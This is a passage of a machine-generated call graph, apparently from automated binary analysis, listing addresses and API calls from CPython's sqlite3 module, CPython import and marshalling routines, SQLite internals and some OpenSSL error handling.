101528 7ff8e700d874 PyErr_SetString 101527->101528 101592 7ff8e70080cf 101528->101592 101529->101528 101593 7ff8e7008150 PyType_FromModuleAndSpec PyModule_GetState 101530->101593 101532 7ff8e7007c6c 101533 7ff8e7008143 sqlite3_shutdown 101532->101533 101594 7ff8e7008198 PyType_FromModuleAndSpec PyModule_GetState 101532->101594 101533->101592 101534 7ff8e700d891 PyErr_Format 101534->101533 101536 7ff8e70080dc PyModule_AddIntConstant 101536->101533 101536->101592 101537 7ff8e7007c7c 101537->101533 101595 7ff8e70081e0 PyType_FromModuleAndSpec PyModule_GetState 101537->101595 101540 7ff8e7007c8c 101540->101533 101596 7ff8e7008224 PyType_FromModuleAndSpec PyModule_GetState 101540->101596 101543 7ff8e7007c9c 101543->101533 101597 7ff8e700826c PyType_FromModuleAndSpec PyModule_GetState 101543->101597 101544 7ff8e7008108 PyModule_GetState _PyImport_GetModuleAttrString 101544->101533 101546 7ff8e7008131 101544->101546 101547 7ff8e7007cac 101547->101533 101598 7ff8e70082b4 PyType_FromModuleAndSpec PyModule_GetState 101547->101598 101549 7ff8e7007cbc 101549->101533 101550 7ff8e7007cc4 PyModule_GetState PyModule_AddType 101549->101550 101550->101533 101551 7ff8e7007ce5 PyModule_AddType 101550->101551 101551->101533 101552 7ff8e7007cfa PyModule_AddType 101551->101552 101552->101533 101553 7ff8e7007d12 PyModule_AddType 101552->101553 101553->101533 101554 7ff8e7007d2a PyModule_AddType 101553->101554 101554->101533 101555 7ff8e7007d42 PyErr_NewException 101554->101555 101555->101533 101556 7ff8e7007d69 PyModule_AddType 101555->101556 101556->101533 101557 7ff8e7007d7d PyErr_NewException 101556->101557 101557->101533 101558 7ff8e7007da4 PyModule_AddType 101557->101558 101558->101533 101559 7ff8e7007db8 PyErr_NewException 101558->101559 101559->101533 101560 7ff8e7007dd9 PyModule_AddType 101559->101560 101560->101533 101561 7ff8e7007ded PyErr_NewException 101560->101561 101561->101533 101562 7ff8e7007e0e PyModule_AddType 101561->101562 101562->101533 101563 7ff8e7007e22 PyErr_NewException 101562->101563 101563->101533 101564 7ff8e7007e43 PyModule_AddType 101563->101564 101564->101533 101565 7ff8e7007e57 PyErr_NewException 101564->101565 101565->101533 101566 7ff8e7007e78 PyModule_AddType 101565->101566 101566->101533 101567 7ff8e7007e8c PyErr_NewException 101566->101567 101567->101533 101568 7ff8e7007ead PyModule_AddType 101567->101568 101568->101533 101569 7ff8e7007ec1 PyErr_NewException 101568->101569 101569->101533 101570 7ff8e7007ee2 PyModule_AddType 101569->101570 101570->101533 101571 7ff8e7007ef6 PyErr_NewException 101570->101571 101571->101533 101572 7ff8e7007f16 PyModule_AddType 101571->101572 101572->101533 101573 7ff8e7007f2a PyErr_NewException 101572->101573 101573->101533 101574 7ff8e7007f4b PyModule_AddType 101573->101574 101574->101533 101575 7ff8e7007f5f PyUnicode_InternFromString 101574->101575 101575->101533 101576 7ff8e7007f75 PyUnicode_InternFromString 101575->101576 101576->101533 101577 7ff8e7007f92 PyUnicode_InternFromString 101576->101577 101577->101533 101578 7ff8e7007faf PyUnicode_InternFromString 101577->101578 101578->101533 101579 7ff8e7007fcc PyUnicode_InternFromString 101578->101579 101579->101533 101580 7ff8e7007fe9 PyUnicode_InternFromString 101579->101580 101580->101533 101581 7ff8e7008006 PyUnicode_InternFromString 101580->101581 101581->101533 101582 7ff8e7008023 PyUnicode_InternFromString 101581->101582 101582->101533 101583 7ff8e7008040 101582->101583 101599 7ff8e7008390 PyModule_AddIntConstant 101583->101599 101585 7ff8e700804f 101585->101533 101600 7ff8e7008400 65 API calls 101585->101600 101587 7ff8e700805f 101587->101533 101588 7ff8e7008067 PyModule_AddStringConstant 101587->101588 101588->101533 101589 7ff8e7008086 sqlite3_libversion PyModule_AddStringConstant 101588->101589 101589->101533 101590 7ff8e70080a7 PyModule_AddIntConstant 101589->101590 101590->101533 101591 7ff8e70080c3 sqlite3_threadsafe 101590->101591 101591->101592 101592->101533 101592->101534 101592->101536 101592->101544 101601 7ff8e70082f8 PyModule_GetState PyDict_New PyModule_AddObjectRef 101592->101601 101602 7ff8e7008340 PyModule_GetState PyDict_New PyModule_AddObjectRef 101592->101602 101593->101532 101594->101537 101595->101540 101596->101543 101597->101547 101598->101549 101599->101585 101600->101587 101601->101592 101602->101592 101603 7ff8e7148ec3 101634 7ff8e71441e0 101603->101634 101605 7ff8e7148f07 101606 7ff8e7148f43 101605->101606 101611 7ff8e7148f1e 101605->101611 101607 7ff8e7148f69 101606->101607 101609 7ff8e7148f60 _Py_Dealloc 101606->101609 101608 7ff8e7148f81 101607->101608 101612 7ff8e7148f78 _Py_Dealloc 101607->101612 101610 7ff8e7148fa4 101608->101610 101615 7ff8e7148f9e _Py_Dealloc 101608->101615 101609->101607 101613 7ff8e7148fc7 101610->101613 101619 7ff8e7148fc1 _Py_Dealloc 101610->101619 101614 7ff8e7148f31 101611->101614 101616 7ff8e7148f28 _Py_Dealloc 101611->101616 101612->101608 101617 7ff8e7148fea 101613->101617 101620 7ff8e7148fe4 _Py_Dealloc 101613->101620 101615->101610 101616->101614 101618 7ff8e714900d 101617->101618 101622 7ff8e7149007 _Py_Dealloc 101617->101622 101621 7ff8e7149030 101618->101621 101624 7ff8e714902a _Py_Dealloc 101618->101624 101619->101613 101620->101617 101623 7ff8e7149053 101621->101623 101627 7ff8e714904d _Py_Dealloc 101621->101627 101622->101618 101626 7ff8e7149076 101623->101626 101628 7ff8e7149070 _Py_Dealloc 101623->101628 101624->101621 101625 7ff8e7149099 101629 7ff8e71490bc 101625->101629 101632 7ff8e71490b6 _Py_Dealloc 101625->101632 101626->101625 101630 7ff8e7149093 _Py_Dealloc 101626->101630 101627->101623 101628->101626 101631 7ff8e71490df 101629->101631 101633 7ff8e71490d9 _Py_Dealloc 101629->101633 101630->101625 101632->101629 101633->101631 101641 7ff8e714421a 101634->101641 101635 7ff8e71444b1 PyFloat_FromDouble 101639 7ff8e7144471 101635->101639 101640 7ff8e7144614 101635->101640 101636 7ff8e71442d5 PyUnicode_FromStringAndSize 101636->101640 101642 7ff8e71442fd PyUnicode_InternInPlace 101636->101642 101637 7ff8e71443ea 101637->101637 101637->101639 101643 7ff8e7144430 PyLong_FromString 101637->101643 101638 7ff8e714432f 101638->101637 101644 7ff8e71443a5 PyBytes_FromStringAndSize 101638->101644 101639->101635 101647 7ff8e71444d7 101639->101647 101640->101605 101641->101636 101641->101638 101641->101641 101642->101641 101643->101637 101643->101640 101644->101638 101644->101640 101645 7ff8e7144510 PyComplex_FromDoubles 101645->101640 101645->101647 101646 7ff8e7144550 PyTuple_New 101646->101640 101648 7ff8e714453b 101646->101648 101647->101645 101647->101648 101648->101646 101650 7ff8e71445ac 101648->101650 101649 7ff8e71445c0 PyFrozenSet_New 101649->101640 101649->101650 101650->101640 101650->101649 101651 7ff8e71445f4 PySet_Add 101650->101651 101651->101640 101651->101650 101652 7ff8e68ee9e7 101653 7ff8e68eea21 101652->101653 101654 7ff8e68eea0c 101652->101654 101673 7ff8e68d5070 101653->101673 101692 7ff8e68f5690 28 API calls 101654->101692 101659 7ff8e68eea18 101660 7ff8e68f0437 101659->101660 101663 7ff8e68f0dda 101659->101663 101693 7ff8e68b94b0 13 API calls 101659->101693 101662 7ff8e68f1376 101695 7ff8e68b94b0 13 API calls 101662->101695 101663->101662 101694 7ff8e68e0f90 13 API calls 101663->101694 101665 7ff8e68f13c8 101667 7ff8e68f13da 101665->101667 101696 7ff8e68e45a0 66 API calls 101665->101696 101669 7ff8e68f13eb 101667->101669 101697 7ff8e68b6db0 13 API calls 101667->101697 101672 7ff8e68f0e70 101669->101672 101698 7ff8e690fb70 10 API calls 101669->101698 101675 7ff8e68d5145 101673->101675 101678 7ff8e68d5097 101673->101678 101674 7ff8e68d514a 101674->101659 101685 7ff8e68d5260 101674->101685 101675->101674 101699 7ff8e68d12f0 101675->101699 101677 7ff8e68d521c 101710 7ff8e68b94b0 13 API calls 101677->101710 101678->101674 101678->101677 101680 7ff8e68d509d 101678->101680 101680->101674 101681 7ff8e68d51e7 101680->101681 101682 7ff8e68d51f3 101680->101682 101708 7ff8e6972590 13 API calls 101681->101708 101709 7ff8e68d4e60 38 API calls 101682->101709 101690 7ff8e68d5283 101685->101690 101686 7ff8e68d53d0 101686->101659 101687 7ff8e68d53e8 101745 7ff8e68b94b0 13 API calls 101687->101745 101688 7ff8e68d12f0 38 API calls 101688->101690 101690->101686 101690->101687 101690->101688 101744 7ff8e68b94b0 13 API calls 101690->101744 101692->101659 101693->101663 101694->101662 101695->101665 101696->101667 101697->101669 101698->101672 101700 7ff8e68d1354 101699->101700 101701 7ff8e68d130d 101699->101701 101711 7ff8e68c9e80 101700->101711 101730 7ff8e68b94b0 13 API calls 101701->101730 101703 7ff8e68d133e 101703->101678 101706 7ff8e68d1369 101706->101678 101708->101674 101709->101674 101710->101674 101712 7ff8e68c9ea2 101711->101712 101720 7ff8e68c9ed5 101711->101720 101738 7ff8e68b94b0 13 API calls 101712->101738 101714 7ff8e68c9ece 101714->101706 101731 7ff8e68d0fc0 13 API calls 101714->101731 101715 7ff8e68ca050 101719 7ff8e68ca07e 101715->101719 101721 7ff8e68ca068 101715->101721 101716 7ff8e68c9ff8 101739 7ff8e68b94b0 13 API calls 101716->101739 101722 7ff8e68c9f0d 101719->101722 101725 7ff8e68ca09a 101719->101725 101720->101714 101720->101715 101720->101716 101720->101722 101732 7ff8e68c7c40 101721->101732 101722->101714 101740 7ff8e68c6ff0 35 API calls 101722->101740 101723 7ff8e68ca0d5 memset 101723->101714 101725->101723 101726 7ff8e68ca0bd 101725->101726 101741 7ff8e68c31c0 memset memset new[] 101725->101741 101742 7ff8e68c66f0 memset memset memset memset new[] 101726->101742 101729 7ff8e68ca0c7 101729->101723 101730->101703 101731->101706 101733 7ff8e68c7c7c 101732->101733 101734 7ff8e68c7c6f 101732->101734 101736 7ff8e68c7c8c 101733->101736 101737 7ff8e68bdc50 22 API calls 101733->101737 101743 7ff8e68ce520 15 API calls 101734->101743 101736->101722 101737->101736 101738->101714 101739->101722 101741->101726 101742->101729 101743->101733 101744->101690 101745->101686 101746 7ff8e715252e 101747 7ff8e7152534 101746->101747 101748 7ff8e7152543 101746->101748 101747->101748 101749 7ff8e715253a _Py_Dealloc 101747->101749 101754 7ff8e7144640 PyImport_ImportModuleLevelObject 101748->101754 101749->101748 101753 7ff8e715382e 101755 7ff8e71447fb 101754->101755 101764 7ff8e7144683 101754->101764 101771 7ff8e7143880 10 API calls 101755->101771 101756 7ff8e71446b0 PyObject_GetAttr 101757 7ff8e71446cb PyUnicode_FromFormat 101756->101757 101756->101764 101758 7ff8e714477b PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 101757->101758 101759 7ff8e71446ef PyObject_GetItem 101757->101759 101762 7ff8e71447d3 101758->101762 101763 7ff8e71447c4 101758->101763 101759->101764 101760 7ff8e714472d PyDict_SetItem 101760->101764 101761 7ff8e7144735 PyObject_SetItem 101761->101764 101766 7ff8e71447e7 101762->101766 101769 7ff8e71447de _Py_Dealloc 101762->101769 101763->101762 101765 7ff8e71447ca _Py_Dealloc 101763->101765 101764->101755 101764->101756 101764->101758 101764->101760 101764->101761 101764->101766 101767 7ff8e7144709 _Py_Dealloc 101764->101767 101768 7ff8e7144748 _Py_Dealloc 101764->101768 101765->101762 101766->101755 101770 7ff8e71447f2 _Py_Dealloc 101766->101770 101767->101764 101768->101764 101769->101766 101770->101755 101771->101753 101772 7ff8e71df3f0 101773 7ff8e71d132a 101772->101773 101774 7ff8e71df410 SetLastError 101773->101774 101775 7ff8e71df430 101774->101775 101776 7ff8e7008f9e 101777 7ff8e7008fdd 101776->101777 101778 7ff8e700dabe _PyArg_CheckPositional 101776->101778 101779 7ff8e700901e _PyArg_BadArgument 101777->101779 101781 7ff8e7008ff0 101777->101781 101780 7ff8e7009003 101778->101780 101779->101780 101783 7ff8e7004660 101781->101783 101784 7ff8e70046a3 101783->101784 101785 7ff8e7004e52 PyType_GetModuleByDef PyModule_GetState PyErr_SetString 101783->101785 101786 7ff8e7004e12 PyErr_SetString 101784->101786 101788 7ff8e70046b5 PyThread_get_thread_ident 101784->101788 101789 7ff8e70046c4 101784->101789 101787 7ff8e7004e82 PyErr_SetString 101785->101787 101792 7ff8e7004e2c PyThread_get_thread_ident PyErr_Format 101786->101792 101795 7ff8e7004e9b PyErr_SetString 101787->101795 101788->101789 101788->101792 101790 7ff8e700ce9c PyType_GetModuleByDef PyModule_GetState PyErr_SetString 101789->101790 101791 7ff8e70046d1 101789->101791 101798 7ff8e700cecd 101790->101798 101793 7ff8e70046db 101791->101793 101794 7ff8e7004df8 PyErr_SetString 101791->101794 101796 7ff8e7004b1e PyErr_Occurred 101792->101796 101793->101787 101797 7ff8e70046e4 101793->101797 101794->101786 101802 7ff8e7004eb1 _Py_Dealloc 101795->101802 101799 7ff8e7004b4d 101796->101799 101817 7ff8e7004ab2 101796->101817 101800 7ff8e70046f4 PyList_New 101797->101800 101801 7ff8e7004d0a PyIter_Check 101797->101801 101807 7ff8e700cedf _Py_Dealloc 101798->101807 101798->101817 101803 7ff8e7004b52 sqlite3_stmt_busy 101799->101803 101804 7ff8e7004b60 101799->101804 101800->101796 101806 7ff8e7004708 101800->101806 101808 7ff8e7004d1b PyObject_GetIter 101801->101808 101846 7ff8e700475f 101801->101846 101802->101817 101803->101804 101815 7ff8e7004b9c 101803->101815 101957 7ff8e700b550 8 API calls 2 library calls 101804->101957 101805 7ff8e7004ca7 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101805->101817 101809 7ff8e7004c87 101806->101809 101810 7ff8e7004711 PyTuple_New 101806->101810 101807->101817 101808->101817 101808->101846 101813 7ff8e7004725 PyList_Append 101809->101813 101810->101813 101810->101817 101811 7ff8e7004b15 _Py_Dealloc 101811->101796 101813->101798 101816 7ff8e700473c 101813->101816 101814 7ff8e7004b79 101814->101780 101815->101804 101819 7ff8e700cfcb _Py_Dealloc 101815->101819 101820 7ff8e700474a PyObject_GetIter 101816->101820 101825 7ff8e700ceee _Py_Dealloc 101816->101825 101817->101796 101817->101802 101817->101805 101817->101811 101821 7ff8e700cfbc _Py_Dealloc 101817->101821 101828 7ff8e7004afa _Py_Dealloc 101817->101828 101818 7ff8e7004b8e _Py_Dealloc 101818->101846 101819->101804 101820->101817 101820->101846 101821->101817 101822 7ff8e700478f PyObject_Vectorcall 101822->101846 101823 7ff8e700cf0b _Py_Dealloc 101823->101846 101825->101820 101826 7ff8e7004d35 sqlite3_stmt_readonly 101826->101795 101826->101846 101827 7ff8e70047f9 sqlite3_stmt_busy 101827->101846 101828->101817 101829 7ff8e7004816 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101829->101846 101831 7ff8e7004d50 _Py_Dealloc 101833 7ff8e7004a56 PyIter_Next 101831->101833 101832 7ff8e7004864 PyIter_Next 101834 7ff8e7004a6b 101832->101834 101832->101846 101833->101834 101833->101846 101834->101817 101836 7ff8e7004a75 PyEval_SaveThread sqlite3_last_insert_rowid PyEval_RestoreThread PyLong_FromLongLong 101834->101836 101835 7ff8e7004bbd sqlite3_get_autocommit 101835->101832 101839 7ff8e7004bcf PyEval_SaveThread 101835->101839 101836->101817 101840 7ff8e700cfa3 101836->101840 101838 7ff8e700cf17 _Py_Dealloc 101838->101846 101842 7ff8e7004c10 101839->101842 101840->101817 101844 7ff8e700cfad _Py_Dealloc 101840->101844 101842->101842 101852 7ff8e7004c30 sqlite3_prepare_v2 101842->101852 101843 7ff8e7004897 PyEval_SaveThread sqlite3_step PyEval_RestoreThread 101845 7ff8e7004ab4 PyErr_Occurred 101843->101845 101843->101846 101844->101817 101847 7ff8e7004ac3 101845->101847 101848 7ff8e700cf84 101845->101848 101846->101817 101846->101818 101846->101822 101846->101823 101846->101826 101846->101827 101846->101829 101846->101831 101846->101832 101846->101833 101846->101835 101846->101838 101856 7ff8e700cf6d _PyErr_FormatFromCause 101846->101856 101857 7ff8e70048dc PyEval_SaveThread sqlite3_column_count PyEval_RestoreThread 101846->101857 101859 7ff8e700491c PyTuple_New 101846->101859 101861 7ff8e7004a09 sqlite3_changes 101846->101861 101862 7ff8e7004a25 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101846->101862 101863 7ff8e700cf43 _Py_Dealloc 101846->101863 101864 7ff8e7004945 sqlite3_column_name 101846->101864 101866 7ff8e7004980 PyUnicode_FromStringAndSize 101846->101866 101868 7ff8e700cf52 _Py_Dealloc 101846->101868 101869 7ff8e7004ec0 PyEval_SaveThread sqlite3_bind_parameter_count PyEval_RestoreThread 101846->101869 101955 7ff8e7005730 16 API calls 101846->101955 101958 7ff8e7007ad0 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101846->101958 101959 7ff8e70069ac 31 API calls 101846->101959 101956 7ff8e70058d0 17 API calls 101847->101956 101850 7ff8e700cf8b PyErr_Print 101848->101850 101851 7ff8e700cf97 PyErr_Clear 101848->101851 101850->101851 101851->101840 101854 7ff8e7004c71 PyEval_RestoreThread 101852->101854 101855 7ff8e7004c59 sqlite3_step sqlite3_finalize 101852->101855 101854->101832 101858 7ff8e7004c82 101854->101858 101855->101854 101856->101817 101857->101846 101960 7ff8e70058d0 17 API calls 101858->101960 101859->101846 101861->101846 101862->101846 101863->101846 101864->101846 101865 7ff8e700cf61 PyErr_NoMemory 101864->101865 101865->101817 101866->101817 101867 7ff8e7004992 PyTuple_Pack 101866->101867 101867->101846 101868->101846 101911 7ff8e7004f13 101869->101911 101870 7ff8e7005605 PySequence_Check 101871 7ff8e700532a 101870->101871 101870->101911 101874 7ff8e70056eb PyErr_SetString 101871->101874 101891 7ff8e700533e 101871->101891 101872 7ff8e700554f PyErr_Format 101897 7ff8e7004888 PyErr_Occurred 101872->101897 101873 7ff8e7005659 PySequence_Size 101873->101897 101873->101911 101874->101897 101875 7ff8e700545f PyErr_WarnFormat 101875->101897 101875->101911 101876 7ff8e700534d PyEval_SaveThread sqlite3_bind_parameter_name PyEval_RestoreThread 101878 7ff8e70056d2 PyErr_Format 101876->101878 101879 7ff8e7005378 PyUnicode_FromString 101876->101879 101877 7ff8e7004f67 sqlite3_bind_parameter_name 101877->101875 101877->101911 101878->101897 101879->101891 101879->101897 101880 7ff8e7005674 PyErr_Format 101880->101911 101881 7ff8e7005701 PySequence_GetItem 101887 7ff8e700570f _Py_Dealloc 101881->101887 101882 7ff8e70054a1 PyList_GetItem 101882->101911 101883 7ff8e70053a5 PyDict_GetItemWithError 101883->101891 101884 7ff8e700569b PyObject_GetItem 101889 7ff8e70056a9 PyErr_Occurred 101884->101889 101885 7ff8e700507a _Py_Dealloc 101885->101911 101886 7ff8e700541d PyErr_GetRaisedException sqlite3_db_handle 101962 7ff8e70058d0 17 API calls 101886->101962 101887->101897 101894 7ff8e700cff6 PyErr_ExceptionMatches 101889->101894 101895 7ff8e70056b8 PyErr_Format 101889->101895 101890 7ff8e70050f3 PyTuple_Pack 101892 7ff8e7005118 PyDict_GetItemWithError 101890->101892 101901 7ff8e70054f7 101890->101901 101891->101876 101891->101883 101891->101884 101891->101889 101896 7ff8e70053c8 _Py_Dealloc 101891->101896 101891->101897 101930 7ff8e700cfd8 _Py_Dealloc 101891->101930 101939 7ff8e700cfe7 _Py_Dealloc 101891->101939 101940 7ff8e700562d PyErr_GetRaisedException sqlite3_db_handle 101891->101940 101961 7ff8e700a7fc 18 API calls 101891->101961 101963 7ff8e7006b74 20 API calls 101891->101963 101898 7ff8e7005133 101892->101898 101899 7ff8e7005142 101892->101899 101893 7ff8e700543b _PyErr_ChainExceptions1 101893->101897 101894->101897 101894->101901 101895->101897 101896->101891 101897->101817 101897->101843 101898->101899 101902 7ff8e7005139 _Py_Dealloc 101898->101902 101904 7ff8e70054c6 PyObject_CallOneArg 101899->101904 101905 7ff8e7005153 PyErr_Occurred 101899->101905 101900 7ff8e70052cc sqlite3_bind_null 101910 7ff8e70052dd PyFloat_AsDouble 101900->101910 101906 7ff8e700d01b _Py_Dealloc 101901->101906 101934 7ff8e70051c4 101901->101934 101902->101899 101903 7ff8e7004ff8 PyLong_AsLongLongAndOverflow 101908 7ff8e7005506 PyErr_Occurred 101903->101908 101903->101911 101904->101901 101904->101934 101909 7ff8e7005162 _PyObject_LookupAttr 101905->101909 101905->101934 101906->101934 101908->101911 101915 7ff8e7005182 101909->101915 101909->101934 101910->101911 101912 7ff8e70052f9 sqlite3_bind_double 101910->101912 101911->101870 101911->101871 101911->101872 101911->101873 101911->101875 101911->101877 101911->101880 101911->101881 101911->101882 101911->101885 101911->101886 101911->101890 101911->101897 101911->101900 101911->101903 101911->101910 101911->101912 101914 7ff8e7005517 PyErr_SetString 101911->101914 101916 7ff8e7005097 PyUnicode_AsUTF8AndSize 101911->101916 101918 7ff8e7005535 PyErr_Occurred 101911->101918 101919 7ff8e700502e sqlite3_bind_int64 101911->101919 101920 7ff8e700d12f PyErr_Occurred 101911->101920 101924 7ff8e700523e PyType_IsSubtype 101911->101924 101925 7ff8e700d10d PyErr_SetString 101911->101925 101926 7ff8e70050c0 sqlite3_bind_text 101911->101926 101938 7ff8e7005263 PyObject_CheckBuffer 101911->101938 101952 7ff8e700d0e0 PyErr_SetString PyBuffer_Release 101911->101952 101953 7ff8e700529f sqlite3_bind_blob PyBuffer_Release 101911->101953 101912->101911 101914->101911 101921 7ff8e7005193 _PyObject_LookupAttr 101915->101921 101922 7ff8e700d037 PyObject_CallOneArg 101915->101922 101916->101911 101918->101911 101918->101919 101919->101911 101920->101912 101923 7ff8e700d13e 101920->101923 101929 7ff8e70051b3 101921->101929 101921->101934 101927 7ff8e700d05c 101922->101927 101928 7ff8e700d050 101922->101928 101924->101910 101924->101911 101925->101911 101926->101890 101926->101911 101932 7ff8e700d088 101927->101932 101933 7ff8e700d065 101927->101933 101928->101927 101931 7ff8e700d056 _Py_Dealloc 101928->101931 101929->101934 101935 7ff8e700556b PyObject_CallOneArg 101929->101935 101930->101891 101931->101927 101932->101934 101941 7ff8e700d091 PyErr_ExceptionMatches 101932->101941 101933->101921 101947 7ff8e700d079 _Py_Dealloc 101933->101947 101934->101887 101934->101897 101936 7ff8e7005584 101935->101936 101937 7ff8e7005590 101935->101937 101936->101937 101942 7ff8e700558a _Py_Dealloc 101936->101942 101943 7ff8e700d0bd 101937->101943 101944 7ff8e700559d 101937->101944 101938->101880 101945 7ff8e7005274 PyObject_GetBuffer 101938->101945 101939->101891 101964 7ff8e70058d0 17 API calls 101940->101964 101941->101934 101948 7ff8e700d0a9 PyErr_Clear 101941->101948 101942->101937 101943->101934 101954 7ff8e700d0d1 _Py_Dealloc 101943->101954 101944->101934 101949 7ff8e70055a6 PyErr_ExceptionMatches 101944->101949 101945->101911 101947->101921 101948->101934 101949->101934 101951 7ff8e70055be PyErr_Clear 101949->101951 101950 7ff8e700564b _PyErr_ChainExceptions1 101950->101897 101951->101934 101952->101911 101953->101911 101954->101934 101955->101846 101956->101817 101957->101814 101958->101846 101959->101846 101960->101817 101961->101891 101962->101893 101963->101891 101964->101950 101965 7ff8e7004150 101966 7ff8e7004163 PyThread_get_thread_ident 101965->101966 101967 7ff8e7004172 101965->101967 101966->101967 101968 7ff8e7004217 PyThread_get_thread_ident PyErr_Format 101966->101968 101969 7ff8e7004247 PyType_GetModuleByDef PyModule_GetState PyErr_SetString 101967->101969 101970 7ff8e700417c 101967->101970 101971 7ff8e70041db PyWeakref_GetObject 101970->101971 101977 7ff8e700418f 101970->101977 101978 7ff8e7004404 PyEval_SaveThread sqlite3_blob_close PyEval_RestoreThread 101970->101978 101971->101970 101972 7ff8e70041b1 101973 7ff8e7004290 29 API calls 101972->101973 101975 7ff8e70041b9 101973->101975 101974 7ff8e70041ab _Py_Dealloc 101974->101972 101977->101972 101977->101974 101978->101970 101979 7ff8e71f8350 101980 7ff8e71f836a 101979->101980 101981 7ff8e71f8380 ERR_new ERR_set_debug ERR_set_error 101980->101981 101982 7ff8e71f83b8 101980->101982 101986 7ff8e71f83be 101981->101986 101983 7ff8e71f844c ERR_new ERR_set_debug ERR_set_error 101982->101983 101984 7ff8e71f83da 101982->101984 101982->101986 101983->101986 101985 7ff8e71f83ed ASYNC_get_current_job 101984->101985 101984->101986 101985->101986 101987 7ff8e690f610 101988 7ff8e690f641 101987->101988 101989 7ff8e690f63c 101987->101989 101991 7ff8e690f73a 101988->101991 101996 7ff8e690f727 101988->101996 101998 7ff8e690f73e 101988->101998 102004 7ff8e694b4d0 15 API calls new[] 101988->102004 102000 7ff8e69328a0 101989->102000 101992 7ff8e690f780 101991->101992 101993 7ff8e690f796 101991->101993 101991->101998 102006 7ff8e68ba550 13 API calls 101992->102006 102007 7ff8e68ba550 13 API calls 101993->102007 101996->101991 102005 7ff8e694d2e0 18 API calls new[] 101996->102005 102001 7ff8e69328b9 102000->102001 102002 7ff8e69328c5 102000->102002 102008 7ff8e69327d0 102001->102008 102002->101988 102004->101996 102005->101991 102006->101998 102007->101998 102009 7ff8e693280a 102008->102009 102011 7ff8e6932817 102008->102011 102014 7ff8e6932310 102009->102014 102012 7ff8e693286d 102011->102012 102013 7ff8e6932310 85 API calls 102011->102013 102012->102002 102013->102011 102046 7ff8e6932010 102014->102046 102016 7ff8e69323f7 102021 7ff8e69dabc0 8 API calls 102016->102021 102017 7ff8e69323cc 102017->102016 102026 7ff8e69324b8 102017->102026 102029 7ff8e693249e 102017->102029 102077 7ff8e68d2ba0 102017->102077 102018 7ff8e6932791 102121 7ff8e690fb70 10 API calls 102018->102121 102022 7ff8e69327b1 102021->102022 102022->102011 102024 7ff8e6932451 102025 7ff8e6932457 102024->102025 102024->102026 102025->102029 102114 7ff8e68b69b0 13 API calls new[] 102025->102114 102028 7ff8e693255a 102026->102028 102031 7ff8e6932520 102026->102031 102115 7ff8e68b69b0 13 API calls new[] 102028->102115 102029->102016 102029->102018 102120 7ff8e68b6db0 13 API calls 102029->102120 102030 7ff8e6932487 102030->102029 102035 7ff8e693248f memcpy 102030->102035 102033 7ff8e6932679 102031->102033 102034 7ff8e6932633 102031->102034 102038 7ff8e6932540 102031->102038 102086 7ff8e68b92e0 102033->102086 102116 7ff8e68b69b0 13 API calls new[] 102034->102116 102035->102029 102038->102029 102119 7ff8e68d3f60 55 API calls 102038->102119 102042 7ff8e69326dd 102043 7ff8e693270b 102042->102043 102117 7ff8e690cc40 84 API calls 102042->102117 102043->102038 102118 7ff8e690fc00 10 API calls 102043->102118 102047 7ff8e6932032 102046->102047 102067 7ff8e69322c3 102046->102067 102048 7ff8e693203b 102047->102048 102051 7ff8e6932053 102047->102051 102169 7ff8e6931f00 13 API calls 102048->102169 102050 7ff8e6932046 102050->102017 102053 7ff8e6932092 102051->102053 102058 7ff8e693223d 102051->102058 102054 7ff8e69320e4 102053->102054 102170 7ff8e6931f00 13 API calls 102053->102170 102122 7ff8e6932bb0 memset 102054->102122 102057 7ff8e6932151 102060 7ff8e6932196 102057->102060 102057->102067 102068 7ff8e69321dc 102057->102068 102058->102067 102176 7ff8e6931f00 13 API calls 102058->102176 102174 7ff8e68b94b0 13 API calls 102060->102174 102062 7ff8e6932149 102171 7ff8e68b6db0 13 API calls 102062->102171 102063 7ff8e6932153 102063->102057 102172 7ff8e69709d0 16 API calls 102063->102172 102064 7ff8e69321a5 102175 7ff8e68b94b0 13 API calls 102064->102175 102067->102017 102158 7ff8e68e4a40 69 API calls 102068->102158 102070 7ff8e69321cd 102070->102017 102072 7ff8e6932164 102173 7ff8e6931f00 13 API calls 102072->102173 102074 7ff8e6932208 102159 7ff8e696f120 102074->102159 102076 7ff8e693222e 102076->102017 102083 7ff8e68d2bd7 102077->102083 102078 7ff8e68d2c39 102078->102024 102081 7ff8e68d2df5 102081->102078 102274 7ff8e68cb080 memset memset new[] 102081->102274 102083->102078 102083->102081 102260 7ff8e68d2780 102083->102260 102271 7ff8e68ca3f0 memcmp 102083->102271 102272 7ff8e68d2ad0 14 API calls 102083->102272 102273 7ff8e68c6ff0 35 API calls 102083->102273 102306 7ff8e68b9210 102086->102306 102089 7ff8e692b060 102090 7ff8e692b096 102089->102090 102091 7ff8e692b08d 102089->102091 102090->102091 102112 7ff8e692b100 102090->102112 102364 7ff8e68b94b0 13 API calls 102091->102364 102093 7ff8e692b0c5 102365 7ff8e68b94b0 13 API calls 102093->102365 102095 7ff8e692b0ef 102095->102042 102099 7ff8e692b52d 102101 7ff8e692b5d5 102099->102101 102373 7ff8e69709d0 16 API calls 102099->102373 102101->102042 102103 7ff8e692b5cd new[] 102103->102101 102106 7ff8e692b5fe memcpy 102103->102106 102105 7ff8e692b566 102107 7ff8e692b50a 102105->102107 102372 7ff8e68e4a40 69 API calls 102105->102372 102106->102101 102107->102099 102370 7ff8e68e4a40 69 API calls 102107->102370 102111 7ff8e692b554 102371 7ff8e68b6db0 13 API calls 102111->102371 102112->102105 102112->102107 102112->102111 102330 7ff8e6933160 102112->102330 102342 7ff8e68e7e80 102112->102342 102366 7ff8e68b69b0 13 API calls new[] 102112->102366 102367 7ff8e68e8f10 16 API calls 102112->102367 102368 7ff8e68e0690 16 API calls 102112->102368 102369 7ff8e68e4a40 69 API calls 102112->102369 102114->102030 102115->102038 102116->102038 102117->102043 102118->102038 102119->102029 102120->102018 102121->102016 102123 7ff8e6932c80 102122->102123 102124 7ff8e6932c9b 102123->102124 102125 7ff8e6932cb9 102123->102125 102195 7ff8e68ba550 13 API calls 102124->102195 102127 7ff8e6932da7 102125->102127 102145 7ff8e6932d82 102125->102145 102128 7ff8e6932e6d 102127->102128 102130 7ff8e6932ddd 102127->102130 102177 7ff8e696ccb0 102128->102177 102133 7ff8e6932e0e 102130->102133 102134 7ff8e6932de6 